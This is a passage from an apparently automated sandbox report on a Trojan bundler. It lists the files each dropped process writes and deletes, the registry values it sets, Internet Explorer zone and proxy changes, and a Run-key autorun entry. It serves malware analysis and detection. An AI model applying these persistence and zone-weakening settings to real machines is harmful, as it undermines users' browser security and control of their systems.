%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\HIPS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\updlog.dll (0 bytes)

The process BDDownloader.exe:3960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)

The process BDDownloader.exe:3520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdBB.tmp (90616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp\System.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nstBA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp\System.dll (0 bytes)

The process ionrkf_70688.exe:280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nslB8.tmp (110575 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\res\onlineWnd.zip (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMReport.dll.bdl (29865 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMNet.dll.bdl (28289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\System.dll (784 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMSkin.dll (36698 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\dl.dll (65930 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (2503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMNetGetInfo.dll (11344 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\tmplrr89e.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\uqvv.exe.bdl (237681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDLogicUtils.dll.bdl (39225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB7.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)

Registry activity

The process bddownloader.exe:3092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 7C E9 81 DB C4 5B 19 C4 2E 3C E5 AB 8A F4 1F"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process shandian.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 6B 87 EC A5 46 6E 63 4A 37 30 35 A2 89 75 EE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process shandian.exe:2548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Internet Explorer\International]
"W2KLpk" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT]
"shandian.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"shandian.exe" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"ieframe.dll.mui,-12385" = "Favorites Bar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE]
"shandian.exe" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 22 B1 30 05 3E 63 65 75 98 52 A6 FA 46 3E B6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process pczh_98_2.exe:3228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 2D 79 EC DF 95 C8 D2 EC A8 34 97 6C 34 05 14"

[HKLM\SOFTWARE\tyoh]
"EN" = "pczh_98_2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\tyoh]
"ED" = "98"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\tyoh]
"et" = "2920146"

The process %original file name%.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayName" = "ÉÁµçä¯ÀÀÆ÷"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"F30241_s_0523.exe" = "百度杀毒安装程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"pczh_98_2.exe" = "pczh_98_2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"Publisher" = "ÉÁµç"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"URLInfoAbout" = "http://www.sd.com"
"DisplayIcon" = "%Program Files%\shandian\shandian.exe"

"UninstallString" = "%Program Files%\shandian\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"ionrkf_70688.exe" = "ionrkf_70688"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 40 A4 4D F4 CD 40 BE EC 05 61 05 B4 2F B7 2C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..]
"dudu_b_55045.exe" = "安装包程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sdad.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 78 BB 29 F2 40 AC 65 60 84 7D 94 B7 74 D6 02"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dudu_b_55045.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED F0 79 6C 84 2C FD A5 8F E6 F9 8C A9 52 EF 8D"

The process F30241_s_0523.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\AppID\ieCommonPlugin.DLL]
"AppID" = "{6B4447CA-C33E-4E65-914D-C7B346D73F80}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-6-29"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\VersionIndependentProgID]
"(Default)" = "ieCommonPlugin.Implement"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "1.8.0.1255"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayVersion" = "1.8.0.1255"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\ProgID]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\ieCommonPlugin.Implement]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
